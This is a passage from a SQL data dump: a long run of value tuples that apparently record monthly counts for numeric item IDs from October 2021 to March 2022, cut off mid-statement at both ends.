),(4416,2,'202110',22),(4432,2,'202110',22),(485,2,'202110',23),(1726,2,'202110',23),(1730,2,'202110',23),(2956,2,'202110',23),(4396,2,'202110',23),(4436,2,'202110',23),(4440,2,'202110',23),(4444,2,'202110',23),(4448,2,'202110',23),(470,2,'202110',24),(1695,2,'202110',24),(2165,2,'202110',24),(2704,2,'202110',24),(3245,2,'202110',24),(3307,2,'202110',24),(4301,2,'202110',24),(486,2,'202110',25),(570,2,'202110',25),(1722,2,'202110',25),(2617,2,'202110',25),(2911,2,'202110',25),(3004,2,'202110',25),(4368,2,'202110',25),(4420,2,'202110',25),(471,2,'202110',26),(2804,2,'202110',26),(3482,2,'202110',26),(3313,2,'202110',27),(4326,2,'202110',27),(3290,2,'202110',28),(4338,2,'202110',28),(3005,2,'202110',29),(3087,2,'202110',29),(4335,2,'202110',29),(478,2,'202110',30),(2609,2,'202110',30),(3742,2,'202110',30),(3771,2,'202110',30),(1592,2,'202110',31),(2154,2,'202110',31),(3069,2,'202110',31),(3746,2,'202110',31),(4332,2,'202110',31),(4454,2,'202110',31),(468,2,'202110',32),(3777,2,'202110',32),(473,2,'202110',33),(474,2,'202110',33),(1584,2,'202110',33),(74,2,'202110',34),(3045,2,'202110',34),(3060,2,'202110',34),(3117,2,'202110',34),(3127,2,'202110',34),(1604,2,'202110',35),(2296,2,'202110',35),(1598,2,'202110',37),(4238,2,'202110',37),(469,2,'202110',38),(4457,2,'202110',39),(335,2,'202110',40),(472,2,'202110',40),(2813,2,'202110',40),(3063,2,'202110',40),(3710,2,'202110',41),(1596,2,'202110',42),(1614,2,'202110',42),(2297,2,'202110',42),(2769,2,'202110',42),(3083,2,'202110',42),(2809,2,'202110',43),(4341,2,'202110',44),(1718,2,'202110',45),(487,2,'202110',46),(2457,2,'202110',46),(84,2,'202110',50),(1612,2,'202110',50),(108,2,'202110',52),(3764,2,'202110',52),(1728,2,'202110',53),(1606,2,'202110',54),(76,2,'202110',60),(1608,2,'202110',61),(1544,2,'202110',63),(1582,2,'202110',63),(4400,2,'202110',67),(89,2,'202110',68),(1594,2,'202110',68),(1600,2,'202110',68),(2159,2,'202110',68),(3781,2,'202110',69),(68,2,'202110',70),(87,2,'202110',71),(91,2,'202110',73),(1588,2,'202110',74),(2503,2,'202110',78),(1586,2,'202110',124),(72,2,'202110',125),(2309,2,'202110',134),(1602,2,'202110',151),(3030,2,'202110',151),(80,2,'202110',236),(2904,2,'202110',407),(9,2,'202110',3527),(110,2,'202111',6),(3229,2,'202111',7),(3489,2,'202111',7),(3774,2,'202111',7),(106,2,'202111',8),(3096,2,'202111',8),(3247,2,'202111',8),(3479,2,'202111',8),(3240,2,'202111',9),(3261,2,'202111',9),(3297,2,'202111',9),(3541,2,'202111',9),(3738,2,'202111',9),(1705,2,'202111',10),(1709,2,'202111',10),(2152,2,'202111',10),(2993,2,'202111',10),(3092,2,'202111',10),(3243,2,'202111',10),(3249,2,'202111',10),(3265,2,'202111',10),(3287,2,'202111',10),(3316,2,'202111',10),(3727,2,'202111',10),(1732,2,'202111',11),(1751,2,'202111',11),(1782,2,'202111',11),(2751,2,'202111',11),(2956,2,'202111',11),(3027,2,'202111',11),(3107,2,'202111',11),(3275,2,'202111',11),(3731,2,'202111',11),(4357,2,'202111',11),(471,2,'202111',12),(2296,2,'202111',12),(2964,2,'202111',12),(3023,2,'202111',12),(3257,2,'202111',12),(3269,2,'202111',12),(3280,2,'202111',12),(3486,2,'202111',12),(3714,2,'202111',12),(3721,2,'202111',12),(3749,2,'202111',12),(1713,2,'202111',13),(1715,2,'202111',13),(1730,2,'202111',13),(1739,2,'202111',13),(1741,2,'202111',13),(1743,2,'202111',13),(1747,2,'202111',13),(1770,2,'202111',13),(2063,2,'202111',13),(2150,2,'202111',13),(3124,2,'202111',13),(3226,2,'202111',13),(3253,2,'202111',13),(3259,2,'202111',13),(3438,2,'202111',13),(3735,2,'202111',13),(4373,2,'202111',13),(4404,2,'202111',13),(4408,2,'202111',13),(4444,2,'202111',13),(476,2,'202111',14),(481,2,'202111',14),(488,2,'202111',14),(1720,2,'202111',14),(1722,2,'202111',14),(1734,2,'202111',14),(1749,2,'202111',14),(1780,2,'202111',14),(2252,2,'202111',14),(3004,2,'202111',14),(3006,2,'202111',14),(3066,2,'202111',14),(3097,2,'202111',14),(3102,2,'202111',14),(3263,2,'202111',14),(3267,2,'202111',14),(3278,2,'202111',14),(3313,2,'202111',14),(102,2,'202111',15),(485,2,'202111',15),(1701,2,'202111',15),(1724,2,'202111',15),(1766,2,'202111',15),(1772,2,'202111',15),(1774,2,'202111',15),(2161,2,'202111',15),(2248,2,'202111',15),(2293,2,'202111',15),(2748,2,'202111',15),(2965,2,'202111',15),(3083,2,'202111',15),(3273,2,'202111',15),(3498,2,'202111',15),(3742,2,'202111',15),(3752,2,'202111',15),(3771,2,'202111',15),(4275,2,'202111',15),(4368,2,'202111',15),(4387,2,'202111',15),(4391,2,'202111',15),(4396,2,'202111',15),(4432,2,'202111',15),(1695,2,'202111',16),(1768,2,'202111',16),(2801,2,'202111',16),(3109,2,'202111',16),(3534,2,'202111',16),(4377,2,'202111',16),(4440,2,'202111',16),(477,2,'202111',17),(479,2,'202111',17),(480,2,'202111',17),(1697,2,'202111',17),(1707,2,'202111',17),(1711,2,'202111',17),(1745,2,'202111',17),(2154,2,'202111',17),(2775,2,'202111',17),(2991,2,'202111',17),(3079,2,'202111',17),(3271,2,'202111',17),(3430,2,'202111',17),(3777,2,'202111',17),(4301,2,'202111',17),(4329,2,'202111',17),(4382,2,'202111',17),(4428,2,'202111',17),(486,2,'202111',18),(1584,2,'202111',18),(1610,2,'202111',18),(1737,2,'202111',18),(2148,2,'202111',18),(2156,2,'202111',18),(2165,2,'202111',18),(2911,2,'202111',18),(3034,2,'202111',18),(3041,2,'202111',18),(3090,2,'202111',18),(3104,2,'202111',18),(3307,2,'202111',18),(4420,2,'202111',18),(1778,2,'202111',19),(2178,2,'202111',19),(2558,2,'202111',19),(3087,2,'202111',19),(3117,2,'202111',19),(4424,2,'202111',19),(478,2,'202111',20),(482,2,'202111',20),(1590,2,'202111',20),(1699,2,'202111',20),(1726,2,'202111',20),(3251,2,'202111',20),(3285,2,'202111',20),(3290,2,'202111',20),(4448,2,'202111',20),(483,2,'202111',21),(1703,2,'202111',21),(1776,2,'202111',21),(2297,2,'202111',21),(2617,2,'202111',21),(2658,2,'202111',21),(3063,2,'202111',21),(4412,2,'202111',21),(474,2,'202111',22),(1596,2,'202111',22),(2704,2,'202111',22),(3038,2,'202111',22),(4363,2,'202111',22),(74,2,'202111',23),(1718,2,'202111',23),(2769,2,'202111',23),(3245,2,'202111',23),(484,2,'202111',24),(1728,2,'202111',24),(3746,2,'202111',24),(4323,2,'202111',24),(3482,2,'202111',25),(3724,2,'202111',25),(4338,2,'202111',25),(4436,2,'202111',25),(2609,2,'202111',26),(2989,2,'202111',26),(3531,2,'202111',26),(473,2,'202111',27),(1592,2,'202111',27),(1614,2,'202111',27),(2804,2,'202111',27),(487,2,'202111',29),(570,2,'202111',29),(3072,2,'202111',29),(468,2,'202111',30),(472,2,'202111',30),(4332,2,'202111',30),(470,2,'202111',31),(3045,2,'202111',32),(4238,2,'202111',32),(4416,2,'202111',32),(3060,2,'202111',33),(3710,2,'202111',33),(4400,2,'202111',33),(469,2,'202111',34),(2813,2,'202111',34),(3069,2,'202111',34),(4326,2,'202111',34),(2809,2,'202111',35),(3282,2,'202111',36),(3127,2,'202111',37),(335,2,'202111',38),(467,2,'202111',38),(2159,2,'202111',40),(2503,2,'202111',44),(4454,2,'202111',44),(1588,2,'202111',46),(4341,2,'202111',46),(1604,2,'202111',47),(4335,2,'202111',47),(3764,2,'202111',48),(1612,2,'202111',49),(1582,2,'202111',50),(3781,2,'202111',51),(108,2,'202111',54),(1544,2,'202111',54),(2457,2,'202111',55),(84,2,'202111',56),(3030,2,'202111',56),(91,2,'202111',58),(1594,2,'202111',58),(76,2,'202111',59),(87,2,'202111',59),(3005,2,'202111',60),(1606,2,'202111',61),(1608,2,'202111',61),(89,2,'202111',73),(1598,2,'202111',73),(2309,2,'202111',100),(1600,2,'202111',103),(68,2,'202111',105),(4457,2,'202111',110),(72,2,'202111',116),(1586,2,'202111',129),(1602,2,'202111',143),(80,2,'202111',224),(2904,2,'202111',268),(9,2,'202111',3343),(110,2,'202112',2),(106,2,'202112',5),(2152,2,'202112',10),(1705,2,'202112',11),(1745,2,'202112',12),(1747,2,'202112',13),(1751,2,'202112',13),(2252,2,'202112',13),(3034,2,'202112',13),(3249,2,'202112',13),(3541,2,'202112',13),(1701,2,'202112',14),(1780,2,'202112',14),(2993,2,'202112',14),(3229,2,'202112',14),(3263,2,'202112',14),(1734,2,'202112',15),(1741,2,'202112',15),(1782,2,'202112',15),(2293,2,'202112',15),(2296,2,'202112',15),(3269,2,'202112',15),(3278,2,'202112',15),(3727,2,'202112',15),(1718,2,'202112',16),(1726,2,'202112',16),(1739,2,'202112',16),(1772,2,'202112',16),(2148,2,'202112',16),(3104,2,'202112',16),(3251,2,'202112',16),(3259,2,'202112',16),(3265,2,'202112',16),(3714,2,'202112',16),(3738,2,'202112',16),(1707,2,'202112',17),(1709,2,'202112',17),(1715,2,'202112',17),(2063,2,'202112',17),(2154,2,'202112',17),(2965,2,'202112',17),(3240,2,'202112',17),(3247,2,'202112',17),(3271,2,'202112',17),(3287,2,'202112',17),(1711,2,'202112',18),(1722,2,'202112',18),(1732,2,'202112',18),(1743,2,'202112',18),(1774,2,'202112',18),(2150,2,'202112',18),(3280,2,'202112',18),(3282,2,'202112',18),(3721,2,'202112',18),(3724,2,'202112',18),(3749,2,'202112',18),(1695,2,'202112',19),(1697,2,'202112',19),(1699,2,'202112',19),(1720,2,'202112',19),(1737,2,'202112',19),(3066,2,'202112',19),(3097,2,'202112',19),(3102,2,'202112',19),(3109,2,'202112',19),(3275,2,'202112',19),(3307,2,'202112',19),(3534,2,'202112',19),(4275,2,'202112',19),(4408,2,'202112',19),(1713,2,'202112',20),(1730,2,'202112',20),(1749,2,'202112',20),(2156,2,'202112',20),(2751,2,'202112',20),(2991,2,'202112',20),(3096,2,'202112',20),(3107,2,'202112',20),(3261,2,'202112',20),(3273,2,'202112',20),(3731,2,'202112',20),(4357,2,'202112',20),(102,2,'202112',21),(483,2,'202112',21),(1703,2,'202112',21),(1768,2,'202112',21),(2178,2,'202112',21),(2248,2,'202112',21),(2558,2,'202112',21),(2748,2,'202112',21),(3004,2,'202112',21),(3038,2,'202112',21),(3092,2,'202112',21),(3124,2,'202112',21),(4404,2,'202112',21),(481,2,'202112',22),(1776,2,'202112',22),(2964,2,'202112',22),(3041,2,'202112',22),(3243,2,'202112',22),(3257,2,'202112',22),(3297,2,'202112',22),(3316,2,'202112',22),(3489,2,'202112',22),(3735,2,'202112',22),(3774,2,'202112',22),(4387,2,'202112',22),(2617,2,'202112',23),(3006,2,'202112',23),(3245,2,'202112',23),(3253,2,'202112',23),(4329,2,'202112',23),(4424,2,'202112',23),(4428,2,'202112',23),(471,2,'202112',24),(480,2,'202112',24),(1766,2,'202112',24),(2161,2,'202112',24),(3023,2,'202112',24),(3079,2,'202112',24),(3090,2,'202112',24),(3267,2,'202112',24),(4377,2,'202112',24),(4382,2,'202112',24),(4416,2,'202112',24),(4432,2,'202112',24),(476,2,'202112',25),(1778,2,'202112',25),(3027,2,'202112',25),(3285,2,'202112',25),(3430,2,'202112',25),(3498,2,'202112',25),(4301,2,'202112',25),(4373,2,'202112',25),(4436,2,'202112',25),(4440,2,'202112',25),(484,2,'202112',26),(1590,2,'202112',26),(1770,2,'202112',26),(3072,2,'202112',26),(3226,2,'202112',26),(3290,2,'202112',26),(3777,2,'202112',26),(4368,2,'202112',26),(1592,2,'202112',27),(1610,2,'202112',27),(1728,2,'202112',27),(3479,2,'202112',27),(3486,2,'202112',27),(4338,2,'202112',27),(4363,2,'202112',27),(4420,2,'202112',27),(4444,2,'202112',27),(4396,2,'202112',28),(478,2,'202112',29),(479,2,'202112',29),(1596,2,'202112',29),(2165,2,'202112',29),(2801,2,'202112',29),(4412,2,'202112',29),(488,2,'202112',30),(2297,2,'202112',30),(2775,2,'202112',30),(3313,2,'202112',30),(4514,2,'202112',30),(2609,2,'202112',31),(2911,2,'202112',31),(3030,2,'202112',31),(3438,2,'202112',31),(3482,2,'202112',31),(4323,2,'202112',31),(4448,2,'202112',31),(1584,2,'202112',32),(2989,2,'202112',32),(3083,2,'202112',32),(3087,2,'202112',32),(3117,2,'202112',32),(3771,2,'202112',32),(482,2,'202112',33),(485,2,'202112',33),(570,2,'202112',33),(1604,2,'202112',33),(2769,2,'202112',33),(2804,2,'202112',33),(4332,2,'202112',33),(4517,2,'202112',33),(486,2,'202112',34),(2956,2,'202112',34),(3005,2,'202112',34),(1724,2,'202112',35),(3060,2,'202112',35),(3752,2,'202112',35),(4391,2,'202112',35),(477,2,'202112',36),(474,2,'202112',37),(3710,2,'202112',37),(4520,2,'202112',37),(3531,2,'202112',38),(3742,2,'202112',38),(4335,2,'202112',38),(4341,2,'202112',38),(4524,2,'202112',38),(468,2,'202112',39),(473,2,'202112',39),(2809,2,'202112',39),(467,2,'202112',41),(470,2,'202112',41),(487,2,'202112',42),(3746,2,'202112',42),(3063,2,'202112',43),(3045,2,'202112',44),(3069,2,'202112',44),(4454,2,'202112',45),(1588,2,'202112',46),(1614,2,'202112',46),(2159,2,'202112',46),(4326,2,'202112',46),(2658,2,'202112',47),(472,2,'202112',48),(74,2,'202112',49),(3127,2,'202112',49),(4400,2,'202112',50),(469,2,'202112',51),(2704,2,'202112',52),(3781,2,'202112',53),(2813,2,'202112',54),(84,2,'202112',55),(1612,2,'202112',55),(4238,2,'202112',55),(4529,2,'202112',56),(1544,2,'202112',57),(1582,2,'202112',58),(1598,2,'202112',58),(335,2,'202112',60),(1608,2,'202112',62),(3764,2,'202112',62),(2457,2,'202112',66),(108,2,'202112',69),(91,2,'202112',70),(1606,2,'202112',70),(4457,2,'202112',76),(1600,2,'202112',82),(2503,2,'202112',82),(76,2,'202112',87),(1594,2,'202112',93),(89,2,'202112',100),(87,2,'202112',113),(2309,2,'202112',114),(68,2,'202112',124),(1602,2,'202112',133),(72,2,'202112',147),(1586,2,'202112',150),(80,2,'202112',208),(2904,2,'202112',482),(9,2,'202112',2960),(110,2,'202201',6),(106,2,'202201',7),(1707,2,'202201',12),(3249,2,'202201',13),(3541,2,'202201',13),(1713,2,'202201',14),(1726,2,'202201',14),(2063,2,'202201',14),(2178,2,'202201',14),(3097,2,'202201',14),(3109,2,'202201',14),(3247,2,'202201',14),(1697,2,'202201',15),(1701,2,'202201',15),(1734,2,'202201',15),(1737,2,'202201',15),(1751,2,'202201',15),(1782,2,'202201',15),(3079,2,'202201',15),(3092,2,'202201',15),(3096,2,'202201',15),(3240,2,'202201',15),(3243,2,'202201',15),(3287,2,'202201',15),(3486,2,'202201',15),(3727,2,'202201',15),(3738,2,'202201',15),(4368,2,'202201',15),(4408,2,'202201',15),(102,2,'202201',16),(479,2,'202201',16),(485,2,'202201',16),(1705,2,'202201',16),(1749,2,'202201',16),(1780,2,'202201',16),(2150,2,'202201',16),(3102,2,'202201',16),(481,2,'202201',17),(1703,2,'202201',17),(1711,2,'202201',17),(1745,2,'202201',17),(1747,2,'202201',17),(1770,2,'202201',17),(2156,2,'202201',17),(3257,2,'202201',17),(3259,2,'202201',17),(3265,2,'202201',17),(3269,2,'202201',17),(3271,2,'202201',17),(3275,2,'202201',17),(3278,2,'202201',17),(3735,2,'202201',17),(3749,2,'202201',17),(4357,2,'202201',17),(4373,2,'202201',17),(476,2,'202201',18),(483,2,'202201',18),(488,2,'202201',18),(1730,2,'202201',18),(1743,2,'202201',18),(2152,2,'202201',18),(2296,2,'202201',18),(2993,2,'202201',18),(3023,2,'202201',18),(3253,2,'202201',18),(3261,2,'202201',18),(3297,2,'202201',18),(3721,2,'202201',18),(3731,2,'202201',18),(4363,2,'202201',18),(4428,2,'202201',18),(471,2,'202201',19),(480,2,'202201',19),(1739,2,'202201',19),(2252,2,'202201',19),(3273,2,'202201',19),(3724,2,'202201',19),(4329,2,'202201',19),(478,2,'202201',20),(1590,2,'202201',20),(1699,2,'202201',20),(1741,2,'202201',20),(1774,2,'202201',20),(2248,2,'202201',20),(2751,2,'202201',20),(2956,2,'202201',20),(2991,2,'202201',20),(3027,2,'202201',20),(3034,2,'202201',20),(3066,2,'202201',20),(3104,2,'202201',20),(3489,2,'202201',20),(3534,2,'202201',20),(4382,2,'202201',20),(482,2,'202201',21),(484,2,'202201',21),(1584,2,'202201',21),(2161,2,'202201',21),(3041,2,'202201',21),(3226,2,'202201',21),(3251,2,'202201',21),(3263,2,'202201',21),(4341,2,'202201',21),(4377,2,'202201',21),(4424,2,'202201',21),(4440,2,'202201',21),(1722,2,'202201',22),(1768,2,'202201',22),(1778,2,'202201',22),(2148,2,'202201',22),(2165,2,'202201',22),(2293,2,'202201',22),(2558,2,'202201',22),(2965,2,'202201',22),(3267,2,'202201',22),(3280,2,'202201',22),(3714,2,'202201',22),(3774,2,'202201',22),(3777,2,'202201',22),(4396,2,'202201',22),(4546,2,'202201',22),(1720,2,'202201',23),(1732,2,'202201',23),(3229,2,'202201',23),(3498,2,'202201',23),(3531,2,'202201',23),(3771,2,'202201',23),(4444,2,'202201',23),(4556,2,'202201',23),(486,2,'202201',24),(1610,2,'202201',24),(2775,2,'202201',24),(3006,2,'202201',24),(3038,2,'202201',24),(3290,2,'202201',24),(3752,2,'202201',24),(4275,2,'202201',24),(4387,2,'202201',24),(2748,2,'202201',25),(3090,2,'202201',25),(3307,2,'202201',25),(3313,2,'202201',25),(3316,2,'202201',25),(4436,2,'202201',25),(1728,2,'202201',26),(1772,2,'202201',26),(2801,2,'202201',26),(2911,2,'202201',26),(3107,2,'202201',26),(3282,2,'202201',26),(3430,2,'202201',26),(3438,2,'202201',26),(3479,2,'202201',26),(3742,2,'202201',26),(4404,2,'202201',26),(4432,2,'202201',26),(1776,2,'202201',27),(2658,2,'202201',27),(3069,2,'202201',27),(4323,2,'202201',27),(4416,2,'202201',27),(474,2,'202201',28),(2964,2,'202201',28),(3124,2,'202201',28),(3245,2,'202201',28),(1695,2,'202201',29),(4412,2,'202201',29),(4420,2,'202201',29),(1766,2,'202201',30),(2154,2,'202201',30),(2617,2,'202201',30),(2989,2,'202201',30),(3004,2,'202201',30),(3083,2,'202201',30),(3285,2,'202201',30),(4338,2,'202201',30),(1709,2,'202201',31),(2609,2,'202201',31),(4301,2,'202201',31),(4332,2,'202201',31),(4514,2,'202201',31),(4448,2,'202201',32),(570,2,'202201',33),(1724,2,'202201',33),(3063,2,'202201',33),(3710,2,'202201',33),(2804,2,'202201',34),(473,2,'202201',35),(3030,2,'202201',35),(74,2,'202201',36),(3117,2,'202201',36),(4551,2,'202201',36),(477,2,'202201',37),(3127,2,'202201',37),(1592,2,'202201',38),(2769,2,'202201',38),(4454,2,'202201',38),(4542,2,'202201',38),(2704,2,'202201',39),(3087,2,'202201',39),(3746,2,'202201',39),(467,2,'202201',40),(1718,2,'202201',40),(4326,2,'202201',40),(4391,2,'202201',40),(2809,2,'202201',41),(3072,2,'202201',41),(4517,2,'202201',41),(1596,2,'202201',42),(3045,2,'202201',42),(2457,2,'202201',44),(3060,2,'202201',44),(472,2,'202201',45),(4520,2,'202201',47),(470,2,'202201',48),(487,2,'202201',48),(1604,2,'202201',48),(4400,2,'202201',48),(3482,2,'202201',49),(1614,2,'202201',51),(335,2,'202201',52),(468,2,'202201',52),(4529,2,'202201',52),(2159,2,'202201',53),(2813,2,'202201',53),(4238,2,'202201',53),(4524,2,'202201',53),(3005,2,'202201',56),(3764,2,'202201',56),(84,2,'202201',59),(1612,2,'202201',60),(2297,2,'202201',60),(1544,2,'202201',61),(2503,2,'202201',63),(3781,2,'202201',64),(469,2,'202201',67),(4457,2,'202201',68),(1588,2,'202201',71),(1715,2,'202201',72),(1598,2,'202201',73),(87,2,'202201',77),(1606,2,'202201',81),(2309,2,'202201',81),(76,2,'202201',89),(4335,2,'202201',93),(1582,2,'202201',95),(1608,2,'202201',97),(91,2,'202201',98),(108,2,'202201',99),(1600,2,'202201',101),(89,2,'202201',118),(68,2,'202201',120),(1594,2,'202201',125),(1602,2,'202201',132),(72,2,'202201',180),(1586,2,'202201',181),(80,2,'202201',247),(2904,2,'202201',458),(9,2,'202201',3106),(110,2,'202202',4),(106,2,'202202',5),(1705,2,'202202',8),(1734,2,'202202',9),(1747,2,'202202',9),(3263,2,'202202',10),(3259,2,'202202',11),(1713,2,'202202',12),(1780,2,'202202',12),(3265,2,'202202',12),(3275,2,'202202',12),(2293,2,'202202',13),(3096,2,'202202',13),(3249,2,'202202',13),(3278,2,'202202',13),(3727,2,'202202',13),(481,2,'202202',14),(1697,2,'202202',14),(1751,2,'202202',14),(2156,2,'202202',14),(2252,2,'202202',14),(2775,2,'202202',14),(3247,2,'202202',14),(3267,2,'202202',14),(3714,2,'202202',14),(1707,2,'202202',15),(1739,2,'202202',15),(1778,2,'202202',15),(3229,2,'202202',15),(3269,2,'202202',15),(3273,2,'202202',15),(3287,2,'202202',15),(3738,2,'202202',15),(476,2,'202202',16),(478,2,'202202',16),(1701,2,'202202',16),(1730,2,'202202',16),(1732,2,'202202',16),(1741,2,'202202',16),(1743,2,'202202',16),(1772,2,'202202',16),(1782,2,'202202',16),(2152,2,'202202',16),(2161,2,'202202',16),(3034,2,'202202',16),(3097,2,'202202',16),(3297,2,'202202',16),(3430,2,'202202',16),(3486,2,'202202',16),(3721,2,'202202',16),(3735,2,'202202',16),(3752,2,'202202',16),(3771,2,'202202',16),(3774,2,'202202',16),(4357,2,'202202',16),(480,2,'202202',17),(1711,2,'202202',17),(1737,2,'202202',17),(1745,2,'202202',17),(2063,2,'202202',17),(2150,2,'202202',17),(2748,2,'202202',17),(3027,2,'202202',17),(3087,2,'202202',17),(3245,2,'202202',17),(3251,2,'202202',17),(3307,2,'202202',17),(3482,2,'202202',17),(3498,2,'202202',17),(3777,2,'202202',17),(4332,2,'202202',17),(4363,2,'202202',17),(4387,2,'202202',17),(102,2,'202202',18),(482,2,'202202',18),(485,2,'202202',18),(1699,2,'202202',18),(1715,2,'202202',18),(2178,2,'202202',18),(2248,2,'202202',18),(3079,2,'202202',18),(3240,2,'202202',18),(3280,2,'202202',18),(3438,2,'202202',18),(4275,2,'202202',18),(4382,2,'202202',18),(479,2,'202202',19),(484,2,'202202',19),(1722,2,'202202',19),(1749,2,'202202',19),(1776,2,'202202',19),(2558,2,'202202',19),(2964,2,'202202',19),(2965,2,'202202',19),(2993,2,'202202',19),(3023,2,'202202',19),(3092,2,'202202',19),(3109,2,'202202',19),(3724,2,'202202',19),(4396,2,'202202',19),(4444,2,'202202',19),(4582,2,'202202',19),(483,2,'202202',20),(1709,2,'202202',20),(1768,2,'202202',20),(2296,2,'202202',20),(2801,2,'202202',20),(3006,2,'202202',20),(3257,2,'202202',20),(3261,2,'202202',20),(3290,2,'202202',20),(3479,2,'202202',20),(3489,2,'202202',20),(3534,2,'202202',20),(3541,2,'202202',20),(3749,2,'202202',20),(4408,2,'202202',20),(1703,2,'202202',21),(2165,2,'202202',21),(3531,2,'202202',21),(3731,2,'202202',21),(4323,2,'202202',21),(4368,2,'202202',21),(4373,2,'202202',21),(4440,2,'202202',21),(4546,2,'202202',21),(1726,2,'202202',22),(1774,2,'202202',22),(3045,2,'202202',22),(3063,2,'202202',22),(3083,2,'202202',22),(3104,2,'202202',22),(3253,2,'202202',22),(4329,2,'202202',22),(4338,2,'202202',22),(4341,2,'202202',22),(4436,2,'202202',22),(4556,2,'202202',22),(1720,2,'202202',23),(1770,2,'202202',23),(2911,2,'202202',23),(2956,2,'202202',23),(2991,2,'202202',23),(3066,2,'202202',23),(3226,2,'202202',23),(3243,2,'202202',23),(4301,2,'202202',23),(474,2,'202202',24),(488,2,'202202',24),(1584,2,'202202',24),(1766,2,'202202',24),(3041,2,'202202',24),(3271,2,'202202',24),(3285,2,'202202',24),(3316,2,'202202',24),(4428,2,'202202',24),(4517,2,'202202',24),(74,2,'202202',25),(1610,2,'202202',25),(2809,2,'202202',25),(3090,2,'202202',25),(3124,2,'202202',25),(486,2,'202202',26),(487,2,'202202',26),(1695,2,'202202',26),(1724,2,'202202',26),(2148,2,'202202',26),(3313,2,'202202',26),(3710,2,'202202',26),(4412,2,'202202',26),(4420,2,'202202',26),(4454,2,'202202',26),(1728,2,'202202',27),(3038,2,'202202',27),(3107,2,'202202',27),(3117,2,'202202',27),(4400,2,'202202',27),(4404,2,'202202',27),(4424,2,'202202',27),(4542,2,'202202',27),(3102,2,'202202',28),(471,2,'202202',29),(1590,2,'202202',29),(2989,2,'202202',30),(3282,2,'202202',30),(3746,2,'202202',30),(4448,2,'202202',30),(2804,2,'202202',31),(3060,2,'202202',31),(4377,2,'202202',31),(467,2,'202202',33),(3004,2,'202202',33),(4416,2,'202202',33),(4432,2,'202202',33),(4529,2,'202202',33),(4551,2,'202202',33),(2617,2,'202202',34),(473,2,'202202',35),(2154,2,'202202',35),(335,2,'202202',36),(3030,2,'202202',36),(470,2,'202202',37),(3072,2,'202202',37),(4514,2,'202202',37),(2658,2,'202202',38),(2751,2,'202202',38),(4391,2,'202202',38),(2609,2,'202202',40),(2769,2,'202202',40),(3764,2,'202202',40),(472,2,'202202',41),(477,2,'202202',41),(3742,2,'202202',41),(1604,2,'202202',42),(1718,2,'202202',43),(2457,2,'202202',43),(2704,2,'202202',43),(3069,2,'202202',43),(84,2,'202202',44),(3127,2,'202202',44),(1592,2,'202202',45),(468,2,'202202',46),(469,2,'202202',46),(1596,2,'202202',46),(4238,2,'202202',46),(4520,2,'202202',46),(4326,2,'202202',47),(2297,2,'202202',48),(1544,2,'202202',49),(1612,2,'202202',49),(2813,2,'202202',49),(3005,2,'202202',49),(570,2,'202202',50),(1614,2,'202202',50),(1588,2,'202202',52),(4524,2,'202202',52),(4566,2,'202202',52),(2503,2,'202202',53),(87,2,'202202',58),(1598,2,'202202',62),(108,2,'202202',63),(1582,2,'202202',65),(91,2,'202202',66),(1606,2,'202202',68),(4335,2,'202202',68),(3781,2,'202202',70),(76,2,'202202',74),(2309,2,'202202',75),(2159,2,'202202',77),(89,2,'202202',78),(4457,2,'202202',82),(1608,2,'202202',87),(68,2,'202202',94),(1594,2,'202202',109),(1600,2,'202202',124),(72,2,'202202',129),(1586,2,'202202',132),(1602,2,'202202',135),(80,2,'202202',220),(2904,2,'202202',224),(9,2,'202202',2597),(106,2,'202203',2),(110,2,'202203',4),(3265,2,'202203',12),(480,2,'202203',13),(1699,2,'202203',13),(1739,2,'202203',13),(2252,2,'202203',13),(2293,2,'202203',13),(2748,2,'202203',13),(3092,2,'202203',13),(3096,2,'202203',13),(3247,2,'202203',13),(3249,2,'202203',13),(3275,2,'202203',13),(3727,2,'202203',13),(1730,2,'202203',14),(3243,2,'202203',14),(102,2,'202203',15),(483,2,'202203',15),(1780,2,'202203',15),(2063,2,'202203',15),(2152,2,'202203',15),(2154,2,'202203',15),(2156,2,'202203',15),(3087,2,'202203',15),(3245,2,'202203',15),(3261,2,'202203',15),(3271,2,'202203',15),(3297,2,'202203',15),(4357,2,'202203',15),(4363,2,'202203',15),(4587,2,'202203',15),(4591,2,'202203',15),(482,2,'202203',16),(1707,2,'202203',16),(1709,2,'202203',16),(1734,2,'202203',16),(1743,2,'202203',16),(1745,2,'202203',16),(1747,2,'202203',16),(1751,2,'202203',16),(1768,2,'202203',16),(1774,2,'202203',16),(2248,2,'202203',16),(2964,2,'202203',16),(3257,2,'202203',16),(3259,2,'202203',16),(3263,2,'202203',16),(3273,2,'202203',16),(3738,2,'202203',16),(484,2,'202203',17),(1703,2,'202203',17),(1718,2,'202203',17),(1722,2,'202203',17),(1749,2,'202203',17),(2161,2,'202203',17),(2965,2,'202203',17),(3034,2,'202203',17),(3097,2,'202203',17),(3229,2,'202203',17),(3287,2,'202203',17),(3430,2,'202203',17),(3541,2,'202203',17),(3714,2,'202203',17),(4368,2,'202203',17),(4408,2,'202203',17),(476,2,'202203',18),(478,2,'202203',18),(1705,2,'202203',18),(1726,2,'202203',18),(3083,2,'202203',18),(3278,2,'202203',18),(3280,2,'202203',18),(3489,2,'202203',18),(3721,2,'202203',18),(4436,2,'202203',18),(4556,2,'202203',18),(481,2,'202203',19),(1697,2,'202203',19),(1713,2,'202203',19),(1715,2,'202203',19),(2165,2,'202203',19),(2178,2,'202203',19),(2993,2,'202203',19),(3079,2,'202203',19),(3438,2,'202203',19),(3482,2,'202203',19),(3735,2,'202203',19),(1776,2,'202203',20),(2617,2,'202203',20),(2991,2,'202203',20),(3005,2,'202203',20),(3109,2,'202203',20),(3240,2,'202203',20),(3253,2,'202203',20),(3269,2,'202203',20),(3498,2,'202203',20),(3731,2,'202203',20),(4275,2,'202203',20),(4301,2,'202203',20),(4382,2,'202203',20),(4424,2,'202203',20),(74,2,'202203',21),(467,2,'202203',21),(1695,2,'202203',21),(1741,2,'202203',21),(1770,2,'202203',21),(1772,2,'202203',21),(1782,2,'202203',21),(2296,2,'202203',21),(3102,2,'202203',21),(3107,2,'202203',21),(3267,2,'202203',21),(3290,2,'202203',21),(3531,2,'202203',21),(3534,2,'202203',21),(4323,2,'202203',21),(4332,2,'202203',21),(4387,2,'202203',21),(4396,2,'202203',21),(4546,2,'202203',21),(479,2,'202203',22),(488,2,'202203',22),(1590,2,'202203',22),(1701,2,'202203',22),(1711,2,'202203',22),(1737,2,'202203',22),(1766,2,'202203',22),(2658,2,'202203',22),(2804,2,'202203',22),(3066,2,'202203',22),(3226,2,'202203',22),(3307,2,'202203',22),(3486,2,'202203',22),